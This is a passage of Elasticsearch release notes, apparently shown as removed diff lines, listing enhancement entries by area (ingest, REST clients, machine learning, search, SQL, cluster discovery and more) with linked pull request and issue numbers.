{es-pull}37401[#37401] - -Features/Ingest:: -* Add ignore_missing property to foreach filter (#22147) {es-pull}31578[#31578] (issue: {es-issue}22147[#22147]) -* Compile mustache template only if field includes '{{' {es-pull}37207[#37207] (issue: {es-issue}37120[#37120]) -* Move ingest-geoip default databases out of config {es-pull}36949[#36949] (issue: {es-issue}36898[#36898]) -* Make the ingest-geoip databases even lazier to load {es-pull}36679[#36679] -* Updates the grok patterns to be consistent with the logstash {es-pull}27181[#27181] - -Features/Java High Level REST Client:: -* HLRC API for _termvectors {es-pull}32610[#32610] (issue: {es-issue}27205[#27205]) -* Fix strict setting exception handling {es-pull}37247[#37247] (issue: {es-issue}37090[#37090]) -* Use nonblocking entity for requests {es-pull}32249[#32249] - -Features/Monitoring:: -* Make Exporters Async {es-pull}35765[#35765] (issue: {es-issue}35743[#35743]) -* Adding mapping for hostname field {es-pull}37288[#37288] -* Remove types from internal monitoring templates and bump to api 7 {es-pull}39888[#39888] (issue: {es-issue}38637[#38637]) - -Features/Stats:: -* Stats to record how often the ClusterState diff mechanism is used successfully {es-pull}26973[#26973] -* Add JVM dns cache expiration config to JvmInfo {es-pull}36372[#36372] - -Features/Watcher:: -* Validate email addresses when storing a watch {es-pull}34042[#34042] (issue: {es-issue}33980[#33980]) -* Move watcher to use seq# and primary term for concurrency control {es-pull}37977[#37977] (issues: {es-issue}10708[#10708], {es-issue}37872[#37872]) -* Use ILM for Watcher history deletion {es-pull}37443[#37443] (issue: {es-issue}32041[#32041]) -* Add whitelist to HttpClient {es-pull}36817[#36817] (issue: {es-issue}29937[#29937]) -* Remove the index type from internal watcher indexes {es-pull}39761[#39761] (issue: {es-issue}38637[#38637]) - -Geo:: -* Adds a name of the field to geopoint parsing errors {es-pull}36529[#36529] (issue: {es-issue}15965[#15965]) -* Add support to ShapeBuilders for building Lucene geometry {es-pull}35707[#35707] (issue: {es-issue}35320[#35320]) -* Add ST_WktToSQL function {es-pull}35416[#35416] (issue: {es-issue}29872[#29872]) - -Index APIs:: -* Add cluster-wide shard limit warnings {es-pull}34021[#34021] (issues: {es-issue}20705[#20705], {es-issue}32856[#32856]) - -Infra/Circuit Breakers:: -* Have circuit breaker succeed on unknown mem usage {es-pull}33125[#33125] (issue: {es-issue}31767[#31767]) -* Account for XContent overhead in in-flight breaker {es-pull}31613[#31613] -* Script Stats: Add compilation limit counter to stats {es-pull}26387[#26387] - -Infra/Core:: -* Add RunOnce utility class that executes a Runnable exactly once {es-pull}35484[#35484] -* Improved IndexNotFoundException's default error message {es-pull}34649[#34649] (issue: {es-issue}34628[#34628]) -* fix a few versionAdded values in ElasticsearchExceptions {es-pull}37877[#37877] -* Add simple method to write collection of writeables {es-pull}37448[#37448] (issue: {es-issue}37398[#37398]) -* Date/Time parsing: Use java time API instead of exception handling {es-pull}37222[#37222] -* [API] spelling: interruptible {es-pull}37049[#37049] (issue: {es-issue}37035[#37035]) -* Enhancements to IndicesQueryCache. 
{es-pull}39099[#39099] (issue: {es-issue}37117[#37117]) -* Change zone formatting for all printers {es-pull}39568[#39568] (issue: {es-issue}38471[#38471]) - -Infra/Logging:: -* Trim the JSON source in indexing slow logs {es-pull}38081[#38081] (issue: {es-issue}38080[#38080]) -* Optimize warning header de-duplication {es-pull}37725[#37725] (issues: {es-issue}35754[#35754], {es-issue}37530[#37530], {es-issue}37597[#37597], {es-issue}37622[#37622]) -* Remove warn-date from warning headers {es-pull}37622[#37622] (issues: {es-issue}35754[#35754], {es-issue}37530[#37530], {es-issue}37597[#37597]) -* Add some deprecation optimizations {es-pull}37597[#37597] (issues: {es-issue}35754[#35754], {es-issue}37530[#37530]) -* Only update response headers if we have a new one {es-pull}37590[#37590] (issues: {es-issue}35754[#35754], {es-issue}37530[#37530]) - -Infra/Packaging:: -* Choose JVM options ergonomically {es-pull}30684[#30684] -* Add OS/architecture classifier to distributions {es-pull}37881[#37881] -* Change file descriptor limit to 65535 {es-pull}37537[#37537] (issue: {es-issue}35839[#35839]) -* Exit batch files explicitly using ERRORLEVEL {es-pull}29583[#29583] (issue: {es-issue}29582[#29582]) -* Add no-jdk distributions {es-pull}39882[#39882] -* Allow AVX-512 on JDK 11+ {es-pull}40828[#40828] (issue: {es-issue}32138[#32138]) -* Use bundled JDK in Docker images {es-pull}40238[#40238] -* Upgrade bundled JDK and Docker images to JDK 12 {es-pull}40229[#40229] -* Bundle java in distributions {es-pull}38013[#38013] (issue: {es-issue}31845[#31845]) - -Infra/REST API:: -* Remove hand-coded XContent duplicate checks {es-pull}34588[#34588] (issues: {es-issue}22073[#22073], {es-issue}22225[#22225], {es-issue}22253[#22253]) -* Add the `include_type_name` option to the search and document APIs. {es-pull}29506[#29506] (issue: {es-issue}15613[#15613]) -* Validate `op_type` for `_create` {es-pull}27483[#27483] - -Infra/Scripting:: -* Tests: Add support for custom contexts to mock scripts {es-pull}34100[#34100] -* Reflect factory signatures in painless classloader {es-pull}34088[#34088] -* Handle missing values in painless {es-pull}32207[#32207] (issue: {es-issue}29286[#29286]) -* Add getZone to JodaCompatibleZonedDateTime {es-pull}37084[#37084] -* [Painless] Add boxed type to boxed type casts for method/return {es-pull}36571[#36571] - -Infra/Settings:: -* Settings: Add keystore creation to add commands {es-pull}26126[#26126] -* Separate out validation of groups of settings {es-pull}34184[#34184] -* Provide a clearer error message on keystore add {es-pull}39327[#39327] (issue: {es-issue}39324[#39324]) - -Infra/Transport API:: -* Change BWC version for VerifyRepositoryResponse {es-pull}30796[#30796] (issue: {es-issue}30762[#30762]) - -Ingest:: -* Grok fix duplicate patterns JAVACLASS and JAVAFILE {es-pull}35886[#35886] -* Implement Drop Processor {es-pull}32278[#32278] (issue: {es-issue}23726[#23726]) - -Java High Level REST Client:: -* Add get users action {es-pull}36332[#36332] (issue: {es-issue}29827[#29827]) -* Add delete template API {es-pull}36320[#36320] (issue: {es-issue}27205[#27205]) -* Implement get-user-privileges API {es-pull}36292[#36292] -* Get Deprecation Info API {es-pull}36279[#36279] (issue: {es-issue}29827[#29827]) -* Add support for Follow Stats API {es-pull}36253[#36253] (issue: {es-issue}33824[#33824]) -* Add support for CCR Stats API {es-pull}36213[#36213] (issue: {es-issue}33824[#33824]) -* Put Role {es-pull}36209[#36209] (issue: {es-issue}29827[#29827]) -* Add index 
templates exist API {es-pull}36132[#36132] (issue: {es-issue}27205[#27205]) -* Add support for CCR Get Auto Follow Pattern apis {es-pull}36049[#36049] (issue: {es-issue}33824[#33824]) -* Add support for CCR Delete Auto Follow Pattern API {es-pull}35981[#35981] (issue: {es-issue}33824[#33824]) -* Remove fromXContent from IndexUpgradeInfoResponse {es-pull}35934[#35934] -* Add delete expired data API {es-pull}35906[#35906] (issue: {es-issue}29827[#29827]) -* Execute watch API {es-pull}35868[#35868] (issue: {es-issue}29827[#29827]) -* Add ability to put user with a password hash {es-pull}35844[#35844] (issue: {es-issue}35242[#35242]) -* Add ML find file structure API {es-pull}35833[#35833] (issue: {es-issue}29827[#29827]) -* Add support for get roles API {es-pull}35787[#35787] (issue: {es-issue}29827[#29827]) -* Added support for CCR Put Auto Follow Pattern API {es-pull}35780[#35780] (issue: {es-issue}33824[#33824]) -* XPack ML info action {es-pull}35777[#35777] (issue: {es-issue}29827[#29827]) -* ML Delete event from Calendar {es-pull}35760[#35760] (issue: {es-issue}29827[#29827]) -* Add ML revert model snapshot API {es-pull}35750[#35750] (issue: {es-issue}29827[#29827]) -* ML Get Calendar Events {es-pull}35747[#35747] (issue: {es-issue}29827[#29827]) -* Add high-level REST client API for `_freeze` and `_unfreeze` {es-pull}35723[#35723] (issue: {es-issue}34352[#34352]) -* Fix issue in equals impl for GlobalOperationPrivileges {es-pull}35721[#35721] -* ML Delete job from calendar {es-pull}35713[#35713] (issue: {es-issue}29827[#29827]) -* ML Add Event To Calendar API {es-pull}35704[#35704] (issue: {es-issue}29827[#29827]) -* Add ML update model snapshot API (#35537) {es-pull}35694[#35694] (issue: {es-issue}29827[#29827]) -* Add support for CCR Unfollow API {es-pull}35693[#35693] (issue: {es-issue}33824[#33824]) -* Clean up PutLicenseResponse {es-pull}35689[#35689] (issue: {es-issue}35547[#35547]) -* Clean up StartBasicResponse {es-pull}35688[#35688] (issue: {es-issue}35547[#35547]) -* Add support for put privileges API {es-pull}35679[#35679] -* ML Add Job to Calendar API {es-pull}35666[#35666] (issue: {es-issue}29827[#29827]) -* Add support for CCR Resume Follow API {es-pull}35638[#35638] (issue: {es-issue}33824[#33824]) -* Add support for get application privileges API {es-pull}35556[#35556] (issue: {es-issue}29827[#29827]) -* Clean up XPackInfoResponse class and related tests {es-pull}35547[#35547] -* Add parameters to stopRollupJob API {es-pull}35545[#35545] (issue: {es-issue}34811[#34811]) -* Add ML delete model snapshot API {es-pull}35537[#35537] (issue: {es-issue}29827[#29827]) -* Add get watch API {es-pull}35531[#35531] (issue: {es-issue}29827[#29827]) -* Add ML Update Filter API {es-pull}35522[#35522] (issue: {es-issue}29827[#29827]) -* Add ml get filters api {es-pull}35502[#35502] (issue: {es-issue}29827[#29827]) -* Add ML get model snapshots API {es-pull}35487[#35487] (issue: {es-issue}29827[#29827]) -* Add "_has_privileges" API to Security Client {es-pull}35479[#35479] (issue: {es-issue}29827[#29827]) -* Add Delete Privileges API to HLRC {es-pull}35454[#35454] (issue: {es-issue}29827[#29827]) -* Add support for CCR Put Follow API {es-pull}35409[#35409] -* Add ML delete filter action {es-pull}35382[#35382] (issue: {es-issue}29827[#29827]) -* Add delete user action {es-pull}35294[#35294] (issue: {es-issue}29827[#29827]) -* HLRC for _mtermvectors {es-pull}35266[#35266] (issues: {es-issue}27205[#27205], {es-issue}33447[#33447]) -* Reindex API with wait_for_completion false 
{es-pull}35202[#35202] (issue: {es-issue}27205[#27205]) -* Add watcher stats API {es-pull}35185[#35185] (issue: {es-issue}29827[#29827]) -* HLRC support for getTask {es-pull}35166[#35166] (issue: {es-issue}27205[#27205]) -* Add GetRollupIndexCaps API {es-pull}35102[#35102] (issue: {es-issue}29827[#29827]) -* HLRC: migration api - upgrade {es-pull}34898[#34898] (issue: {es-issue}29827[#29827]) -* Add stop rollup job support to HL REST Client {es-pull}34702[#34702] (issue: {es-issue}29827[#29827]) -* Bulk Api support for global parameters {es-pull}34528[#34528] (issue: {es-issue}26026[#26026]) -* Add delete rollup job support to HL REST Client {es-pull}34066[#34066] (issue: {es-issue}29827[#29827]) -* Add support for get license basic/trial status API {es-pull}33176[#33176] (issue: {es-issue}29827[#29827]) -* Add machine learning open job {es-pull}32860[#32860] (issue: {es-issue}29827[#29827]) -* Add ML HLRC wrapper and put_job API call {es-pull}32726[#32726] -* Add Get Snapshots High Level REST API {es-pull}31537[#31537] (issue: {es-issue}27205[#27205]) - -Java Low Level REST Client:: -* On retry timeout add root exception {es-pull}25576[#25576] - -License:: -* Require acknowledgement to start_trial license {es-pull}30135[#30135] (issue: {es-issue}30134[#30134]) -* Handle malformed license signatures {es-pull}37137[#37137] (issue: {es-issue}35340[#35340]) - -Machine Learning:: -* Create the ML annotations index {es-pull}36731[#36731] (issues: {es-issue}26034[#26034], {es-issue}33376[#33376]) -* Split in batches and migrate all jobs and datafeeds {es-pull}36716[#36716] (issue: {es-issue}32905[#32905]) -* Add cluster setting to enable/disable config migration {es-pull}36700[#36700] (issue: {es-issue}32905[#32905]) -* Add audits when deprecation warnings occur with datafeed start {es-pull}36233[#36233] -* Add lazy parsing for DatafeedConfig:Aggs,Query {es-pull}36117[#36117] -* Add support for lazy nodes (#29991) {es-pull}34538[#34538] (issue: {es-issue}29991[#29991]) -* Move ML Optimistic Concurrency Control to Seq No {es-pull}38278[#38278] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add explanation so far to file structure finder exceptions {es-pull}38191[#38191] (issue: {es-issue}29821[#29821]) -* Add reason field in JobTaskState {es-pull}38029[#38029] (issue: {es-issue}34431[#34431]) -* Add _meta information to all ML indices {es-pull}37964[#37964] -* Add upgrade mode docs, hlrc, and fix bug {es-pull}37942[#37942] -* Tighten up use of aliases rather than concrete indices {es-pull}37874[#37874] -* Add support for single bucket aggs in Datafeeds {es-pull}37544[#37544] (issue: {es-issue}36838[#36838]) -* Merge the Jindex master feature branch {es-pull}36702[#36702] (issue: {es-issue}32905[#32905]) -* Allow stop unassigned datafeed and relax unset upgrade mode wait {es-pull}39034[#39034] - -Mapping:: -* Log document id when MapperParsingException occurs {es-pull}37800[#37800] (issue: {es-issue}37658[#37658]) -* [API] spelling: unknown {es-pull}37056[#37056] (issue: {es-issue}37035[#37035]) -* Make SourceToParse immutable {es-pull}36971[#36971] -* Use index-prefix fields for terms of length min_chars - 1 {es-pull}36703[#36703] -* Introduce a parameter suppress_types_warnings. 
{es-pull}38923[#38923] - -Network:: -* Add cors support to NioHttpServerTransport {es-pull}30827[#30827] (issue: {es-issue}28898[#28898]) -* Reintroduce mandatory http pipelining support {es-pull}30820[#30820] -* Make http pipelining support mandatory {es-pull}30695[#30695] (issues: {es-issue}28898[#28898], {es-issue}29500[#29500]) -* Add nio http server transport {es-pull}29587[#29587] (issue: {es-issue}28898[#28898]) -* Add class for serializing message to bytes {es-pull}29384[#29384] (issue: {es-issue}28898[#28898]) -* Selectors operate on channel contexts {es-pull}28468[#28468] (issue: {es-issue}27260[#27260]) -* Unify nio read / write channel contexts {es-pull}28160[#28160] (issue: {es-issue}27260[#27260]) -* Create nio-transport plugin for NioTransport {es-pull}27949[#27949] (issue: {es-issue}27260[#27260]) -* Add elasticsearch-nio jar for base nio classes {es-pull}27801[#27801] (issue: {es-issue}27802[#27802]) -* Unify transport settings naming {es-pull}36623[#36623] -* Add sni name to SSLEngine in netty transport {es-pull}33144[#33144] (issue: {es-issue}32517[#32517]) -* Add NioGroup for use in different transports {es-pull}27737[#27737] (issue: {es-issue}27260[#27260]) -* Add read timeouts to http module {es-pull}27713[#27713] -* Implement byte array reusage in `NioTransport` {es-pull}27696[#27696] (issue: {es-issue}27563[#27563]) -* Introduce resizable inbound byte buffer {es-pull}27551[#27551] (issue: {es-issue}27563[#27563]) -* Decouple nio constructs from the tcp transport {es-pull}27484[#27484] (issue: {es-issue}27260[#27260]) -* Remove manual tracking of registered channels {es-pull}27445[#27445] (issue: {es-issue}27260[#27260]) -* Remove tcp profile from low level nio channel {es-pull}27441[#27441] (issue: {es-issue}27260[#27260]) -* Decouple `ChannelFactory` from Tcp classes {es-pull}27286[#27286] (issue: {es-issue}27260[#27260]) -* Enable TLSv1.3 by default for JDKs with support {es-pull}38103[#38103] (issue: {es-issue}32276[#32276]) - -Packaging:: -* Introduce Docker images build {es-pull}36246[#36246] -* Move creation of temporary directory to Java {es-pull}36002[#36002] (issue: {es-issue}31003[#31003]) - -Percolator:: -* Make the `type` parameter optional when percolating existing documents. 
{es-pull}39987[#39987] (issue: {es-issue}39963[#39963]) -* Add support for selecting percolator query candidate matches containing geo_point based queries {es-pull}26040[#26040] - -Plugins:: -* Plugin install: don't print download progress in batch mode {es-pull}36361[#36361] - -Ranking:: -* Add k parameter to PrecisionAtK metric {es-pull}27569[#27569] -* Vector field {es-pull}33022[#33022] (issue: {es-issue}31615[#31615]) - -Recovery:: -* SyncedFlushService.getShardRoutingTable() should use metadata to check for index existence {es-pull}37691[#37691] (issue: {es-issue}33888[#33888]) -* Make prepare engine step of recovery source non-blocking {es-pull}37573[#37573] (issue: {es-issue}37174[#37174]) -* Make recovery source send operations non-blocking {es-pull}37503[#37503] (issue: {es-issue}37458[#37458]) -* Prepare to make send translog of recovery non-blocking {es-pull}37458[#37458] (issue: {es-issue}37291[#37291]) -* Make finalize step of recovery source non-blocking {es-pull}37388[#37388] (issue: {es-issue}37291[#37291]) -* Make recovery source partially non-blocking {es-pull}37291[#37291] (issue: {es-issue}36195[#36195]) -* Do not mutate RecoveryResponse {es-pull}37204[#37204] (issue: {es-issue}37174[#37174]) -* Don't block on peer recovery on the target side {es-pull}37076[#37076] (issue: {es-issue}36195[#36195]) -* Reduce recovery time with compress or secure transport {es-pull}36981[#36981] (issue: {es-issue}33844[#33844]) -* Translog corruption marker {es-pull}33415[#33415] (issue: {es-issue}31389[#31389]) -* Do not wait for advancement of checkpoint in recovery {es-pull}39006[#39006] (issues: {es-issue}38949[#38949], {es-issue}39000[#39000]) -* Exposed engine must include all operations below global checkpoint during rollback {es-pull}36159[#36159] (issue: {es-issue}32867[#32867]) - -Rollup:: -* Add non-X-Pack centric rollup endpoints {es-pull}36383[#36383] (issues: {es-issue}35958[#35958], {es-issue}35962[#35962]) -* Add more diagnostic stats to job {es-pull}35471[#35471] -* Add `wait_for_completion` option to StopRollupJob API {es-pull}34811[#34811] (issue: {es-issue}34574[#34574]) -* Replace the TreeMap in the composite aggregation {es-pull}36675[#36675] - -Scripting:: -* Update joda compat methods to use compat class {es-pull}36654[#36654] -* [Painless] Add boxed type to boxed type casts for method/return {es-pull}36571[#36571] -* [Painless] Add def to boxed type casts {es-pull}36506[#36506] - -Settings:: -* Add user-defined cluster metadata {es-pull}33325[#33325] (issue: {es-issue}33220[#33220]) - -Search:: -* Make limit on number of expanded fields configurable {es-pull}35284[#35284] (issues: {es-issue}26541[#26541], {es-issue}34778[#34778]) -* Search: Simply SingleFieldsVisitor {es-pull}34052[#34052] -* Don't count hits via the collector if the hit count can be computed from index stats. {es-pull}33701[#33701] -* Limit the number of concurrent requests per node {es-pull}31206[#31206] (issue: {es-issue}31192[#31192]) -* Default max concurrent search req. 
numNodes * 5 {es-pull}31171[#31171] (issues: {es-issue}30783[#30783], {es-issue}30994[#30994]) -* Change ScriptException status to 400 (bad request) {es-pull}30861[#30861] (issue: {es-issue}12315[#12315]) -* Change default value to true for transpositions parameter of fuzzy query {es-pull}26901[#26901] -* Introducing "took" time (in ms) for `_msearch` {es-pull}23767[#23767] (issue: {es-issue}23131[#23131]) -* Add copy constructor to SearchRequest {es-pull}36641[#36641] (issue: {es-issue}32125[#32125]) -* Add raw sort values to SearchSortValues transport serialization {es-pull}36617[#36617] (issue: {es-issue}32125[#32125]) -* Add sort and collapse info to SearchHits transport serialization {es-pull}36555[#36555] (issue: {es-issue}32125[#32125]) -* Add default methods to DocValueFormat {es-pull}36480[#36480] -* Respect indices options on _msearch {es-pull}35887[#35887] -* Allow efficient can_match phases on frozen indices {es-pull}35431[#35431] (issues: {es-issue}34352[#34352], {es-issue}34357[#34357]) -* Add a new query type - ScriptScoreQuery {es-pull}34533[#34533] (issues: {es-issue}23850[#23850], {es-issue}27588[#27588], {es-issue}30303[#30303]) -* Tie break on cluster alias when merging shard search failures {es-pull}38715[#38715] (issue: {es-issue}38672[#38672]) -* Add finalReduce flag to SearchRequest {es-pull}38104[#38104] (issues: {es-issue}37000[#37000], {es-issue}37838[#37838]) -* Streamline skip_unavailable handling {es-pull}37672[#37672] (issue: {es-issue}32125[#32125]) -* Expose sequence number and primary terms in search responses {es-pull}37639[#37639] -* Add support for merging multiple search responses into one {es-pull}37566[#37566] (issue: {es-issue}32125[#32125]) -* Allow field types to optimize phrase prefix queries {es-pull}37436[#37436] (issue: {es-issue}31921[#31921]) -* Add support for providing absolute start time to SearchRequest {es-pull}37142[#37142] (issue: {es-issue}32125[#32125]) -* Ensure that local cluster alias is never treated as remote {es-pull}37121[#37121] (issues: {es-issue}32125[#32125], {es-issue}36997[#36997]) -* [API] spelling: cacheable {es-pull}37047[#37047] (issue: {es-issue}37035[#37035]) -* Add ability to suggest shard_size on coord node rewrite {es-pull}37017[#37017] (issues: {es-issue}32125[#32125], {es-issue}36997[#36997], {es-issue}37000[#37000]) -* Skip final reduction if SearchRequest holds a cluster alias {es-pull}37000[#37000] (issues: {es-issue}32125[#32125], {es-issue}36997[#36997]) -* Add support for local cluster alias to SearchRequest {es-pull}36997[#36997] (issue: {es-issue}32125[#32125]) -* Use SearchRequest copy constructor in ExpandSearchPhase {es-pull}36772[#36772] (issue: {es-issue}36641[#36641]) -* Avoid BytesRef's copying in ScriptDocValues's Strings {es-pull}29581[#29581] (issue: {es-issue}29567[#29567]) - -Security:: -* Make credentials mandatory when launching xpack/migrate {es-pull}36197[#36197] (issues: {es-issue}29847[#29847], {es-issue}33972[#33972]) -* Move CAS operations in TokenService to sequence numbers {es-pull}38311[#38311] (issues: {es-issue}10708[#10708], {es-issue}37872[#37872]) -* Cleanup construction of interceptors {es-pull}38294[#38294] -* Add passphrase support to elasticsearch-keystore {es-pull}37472[#37472] (issue: {es-issue}32691[#32691]) -* Types removal security index template {es-pull}39705[#39705] (issue: {es-issue}38637[#38637]) -* Types removal security index template 
{es-pull}39542[#39542] (issue: {es-issue}38637[#38637]) - -Snapshot/Restore:: -* #31608 Add S3 Setting to Force Path Type Access {es-pull}34721[#34721] (issue: {es-issue}31608[#31608]) -* Allow Parallel Restore Operations {es-pull}36397[#36397] -* Repo Creation out of ClusterStateTask {es-pull}36157[#36157] (issue: {es-issue}9488[#9488]) -* Add read-only repository verification {es-pull}35731[#35731] (issue: {es-issue}35703[#35703]) -* RestoreService should update primary terms when restoring shards of existing indices {es-pull}38177[#38177] (issue: {es-issue}33888[#33888]) -* Allow open indices to be restored {es-pull}37733[#37733] -* Create specific exception for when snapshots are in progress {es-pull}37550[#37550] (issue: {es-issue}37541[#37541]) -* Make Atomic Blob Writes Mandatory {es-pull}37168[#37168] (issues: {es-issue}37011[#37011], {es-issue}37066[#37066]) -* Speed up HDFS Repository Writes {es-pull}37069[#37069] -* Implement Atomic Blob Writes for HDFS Repository {es-pull}37066[#37066] (issue: {es-issue}37011[#37011]) -* [API] spelling: repositories {es-pull}37053[#37053] (issue: {es-issue}37035[#37035]) -* Use CancellableThreads to Abort {es-pull}35901[#35901] (issue: {es-issue}21759[#21759]) -* S3 client encryption {es-pull}30513[#30513] (issues: {es-issue}11128[#11128], {es-issue}16843[#16843]) -* Mark Deleted Snapshot Directories with Tombstones {es-pull}40228[#40228] (issue: {es-issue}39852[#39852]) - -Stats:: -* Handle OS pretty name on old OS without OS release {es-pull}35453[#35453] (issue: {es-issue}35440[#35440]) - -Store:: -* Add RemoveCorruptedShardDataCommand {es-pull}32281[#32281] (issues: {es-issue}31389[#31389], {es-issue}32279[#32279]) -* Add option to force load term dict into memory {es-pull}39741[#39741] - -SQL:: -* Introduce support for NULL values {es-pull}34573[#34573] (issue: {es-issue}32079[#32079]) -* Extend the ODBC metric by differentiating between 32 and 64bit platforms {es-pull}36753[#36753] (issue: {es-issue}36740[#36740]) -* Fix wrong appliance of StackOverflow limit for IN {es-pull}36724[#36724] (issue: {es-issue}36592[#36592]) -* Introduce NOW/CURRENT_TIMESTAMP function {es-pull}36562[#36562] (issue: {es-issue}36534[#36534]) -* Move requests' parameters to requests JSON body {es-pull}36149[#36149] (issue: {es-issue}35992[#35992]) -* Make INTERVAL millis optional {es-pull}36043[#36043] (issue: {es-issue}36032[#36032]) -* Implement data type verification for conditionals {es-pull}35916[#35916] (issue: {es-issue}35907[#35907]) -* Implement GREATEST and LEAST functions {es-pull}35879[#35879] (issue: {es-issue}35878[#35878]) -* Implement null safe equality operator `<=>` {es-pull}35873[#35873] (issue: {es-issue}35871[#35871]) -* SYS COLUMNS returns ODBC specific schema {es-pull}35870[#35870] (issue: {es-issue}35376[#35376]) -* Polish grammar for intervals {es-pull}35853[#35853] -* Add filtering to SYS TYPES {es-pull}35852[#35852] (issue: {es-issue}35342[#35342]) -* Implement NULLIF(expr1, expr2) function {es-pull}35826[#35826] (issue: {es-issue}35818[#35818]) -* Lock down JDBC driver {es-pull}35798[#35798] (issue: {es-issue}35437[#35437]) -* Implement NVL(expr1, expr2) {es-pull}35794[#35794] (issue: {es-issue}35782[#35782]) -* Implement ISNULL(expr1, expr2) {es-pull}35793[#35793] (issue: {es-issue}35781[#35781]) -* Implement IFNULL variant of COALESCE {es-pull}35762[#35762] (issue: {es-issue}35749[#35749]) -* XPack FeatureSet functionality {es-pull}35725[#35725] (issue: {es-issue}34821[#34821]) -* Perform lazy evaluation of mismatched mappings 
{es-pull}35676[#35676] (issues: {es-issue}35659[#35659], {es-issue}35675[#35675]) -* Improve validation of unsupported fields {es-pull}35675[#35675] (issue: {es-issue}35673[#35673]) -* Move internals from Joda to java.time {es-pull}35649[#35649] (issue: {es-issue}35633[#35633]) -* Allow look-ahead resolution of aliases for WHERE clause {es-pull}38450[#38450] (issue: {es-issue}29983[#29983]) -* Implement CURRENT_DATE {es-pull}38175[#38175] (issue: {es-issue}38160[#38160]) -* Generate relevant error message when grouping functions are not used in GROUP BY {es-pull}38017[#38017] (issue: {es-issue}37952[#37952]) -* Skip the nested and object field types in case of an ODBC request {es-pull}37948[#37948] (issue: {es-issue}37801[#37801]) -* Add protocol tests and remove jdbc_type from drivers response {es-pull}37516[#37516] (issues: {es-issue}36635[#36635], {es-issue}36882[#36882]) -* Remove slightly used meta commands {es-pull}37506[#37506] (issue: {es-issue}37409[#37409]) -* Describe aliases as views {es-pull}37496[#37496] (issue: {es-issue}37422[#37422]) -* Make `FULL` non-reserved keyword in the grammar {es-pull}37377[#37377] (issue: {es-issue}37376[#37376]) -* Use declared source for error messages {es-pull}37161[#37161] -* Improve error message when unable to translate to ES query DSL {es-pull}37129[#37129] (issue: {es-issue}37040[#37040]) -* [API] spelling: subtract {es-pull}37055[#37055] (issue: {es-issue}37035[#37035]) -* [API] spelling: similar {es-pull}37054[#37054] (issue: {es-issue}37035[#37035]) -* [API] spelling: input {es-pull}37048[#37048] (issue: {es-issue}37035[#37035]) -* Enhance message for PERCENTILE[_RANK] with field as 2nd arg {es-pull}36933[#36933] (issue: {es-issue}36903[#36903]) -* Preserve original source for each expression {es-pull}36912[#36912] (issue: {es-issue}36894[#36894]) -* Enhance checks for inexact fields {es-pull}39427[#39427] (issue: {es-issue}38501[#38501]) -* Change the default precision for CURRENT_TIMESTAMP function {es-pull}39391[#39391] (issue: {es-issue}39288[#39288]) -* Add "fuzziness" option to QUERY and MATCH function predicates {es-pull}40529[#40529] (issue: {es-issue}40495[#40495]) -* Add "validate.properties" property to JDBC's allowed list of settings {es-pull}39050[#39050] (issue: {es-issue}38068[#38068]) - -Suggesters:: -* Remove unused empty constructors from suggestions classes {es-pull}37295[#37295] -* [API] spelling: likelihood {es-pull}37052[#37052] (issue: {es-issue}37035[#37035]) - -Task Management:: -* Periodically try to reassign unassigned persistent tasks {es-pull}36069[#36069] (issue: {es-issue}35792[#35792]) -* Only require task permissions {es-pull}35667[#35667] (issue: {es-issue}35573[#35573]) -* Retry if task can't be written {es-pull}35054[#35054] (issue: {es-issue}33764[#33764]) - -ZenDiscovery:: -* Introduce vote withdrawal {es-pull}35446[#35446] -* Add basic Zen1 transport-level BWC {es-pull}35443[#35443] -* Add diff-based publishing {es-pull}35290[#35290] -* Introduce auto_shrink_voting_configuration setting {es-pull}35217[#35217] -* Introduce transport API for cluster bootstrapping {es-pull}34961[#34961] -* Reconfigure cluster as its membership changes {es-pull}34592[#34592] (issue: {es-issue}33924[#33924]) -* Fail fast on disconnects {es-pull}34503[#34503] -* Add storage-layer 
disruptions to CoordinatorTests {es-pull}34347[#34347] -* Add low-level bootstrap implementation {es-pull}34345[#34345] -* Gather votes from all nodes {es-pull}34335[#34335] -* Add Cluster State Applier {es-pull}34257[#34257] -* Add safety phase to CoordinatorTests {es-pull}34241[#34241] -* Integrate FollowerChecker with Coordinator {es-pull}34075[#34075] -* Integrate LeaderChecker with Coordinator {es-pull}34049[#34049] -* Trigger join when active master detected {es-pull}34008[#34008] -* Update PeerFinder term on term bump {es-pull}33992[#33992] -* Calculate optimal cluster configuration {es-pull}33924[#33924] -* Introduce FollowersChecker {es-pull}33917[#33917] -* Integrate publication pipeline into Coordinator {es-pull}33771[#33771] -* Add DisruptableMockTransport {es-pull}33713[#33713] -* Implement basic cluster formation {es-pull}33668[#33668] -* Introduce LeaderChecker {es-pull}33024[#33024] -* Add leader-side join handling logic {es-pull}33013[#33013] -* Add PeerFinder#onFoundPeersUpdated {es-pull}32939[#32939] -* Introduce PreVoteCollector {es-pull}32847[#32847] -* Introduce ElectionScheduler {es-pull}32846[#32846] -* Introduce ElectionScheduler {es-pull}32709[#32709] -* Add HandshakingTransportAddressConnector {es-pull}32643[#32643] (issue: {es-issue}32246[#32246]) -* Add UnicastConfiguredHostsResolver {es-pull}32642[#32642] (issue: {es-issue}32246[#32246]) -* Cluster state publication pipeline {es-pull}32584[#32584] (issue: {es-issue}32006[#32006]) -* Introduce gossip-like discovery of master nodes {es-pull}32246[#32246] -* Add core coordination algorithm for cluster state publishing {es-pull}32171[#32171] (issue: {es-issue}32006[#32006]) -* Add term and config to cluster state {es-pull}32100[#32100] (issue: {es-issue}32006[#32006]) -* Add discovery types to cluster stats {es-pull}36442[#36442] -* Introduce `zen2` discovery type {es-pull}36298[#36298] -* Persist cluster states the old way on non-master-eligible nodes {es-pull}36247[#36247] (issue: {es-issue}3[#3]) -* Storage layer WriteStateException propagation {es-pull}36052[#36052] -* Implement Tombstone REST APIs {es-pull}36007[#36007] -* Update default for USE_ZEN2 to true {es-pull}35998[#35998] -* Add warning if cluster fails to form fast enough {es-pull}35993[#35993] -* Allow Setting a List of Bootstrap Nodes to Wait for {es-pull}35847[#35847] -* VotingTombstone class {es-pull}35832[#35832] -* PersistedState interface implementation {es-pull}35819[#35819] -* Support rolling upgrades from Zen1 {es-pull}35737[#35737] -* Add lag detector {es-pull}35685[#35685] -* Move ClusterState fields to be persisted to ClusterState.Metadata {es-pull}35625[#35625] -* Introduce ClusterBootstrapService {es-pull}35488[#35488] -* Add elasticsearch-node detach-cluster tool {es-pull}37979[#37979] -* Deprecate minimum_master_nodes {es-pull}37868[#37868] -* Step down as master when configured out of voting configuration {es-pull}37802[#37802] (issue: {es-issue}37712[#37712]) -* Enforce cluster UUIDs 